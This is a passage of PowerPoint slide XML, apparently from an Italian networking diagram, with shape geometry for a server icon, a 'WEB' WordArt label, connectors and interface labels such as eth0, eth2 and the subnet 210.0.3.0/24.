                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9313" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD1CDE4-3EE6-7772-FFD1-34BFFD11EA7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9314" name="Connettore diritto 9313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635C0645-1AE9-FC45-025B-EB317DF04528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9310" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316509" y="2363536"/>
            <a:ext cx="9207" cy="670333"/>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319" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE7B56F-4137-A863-9332-F68533A045EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2155594" y="2539339"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9320" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09530862-265D-9DD4-B973-C5F44279674E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9321" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCE90D8-399A-14EA-051A-FBC3064C8D08}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9325" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5C65A4-DA7E-2A5A-A58E-9F0BEA333FC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="782820" y="3413145"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>210.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9329" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6824D26-87E9-E0DC-B558-93DD87568A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3573491" y="2906075"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9330" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A860F55-5426-6ECA-6C4B-F5DCB7428625}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
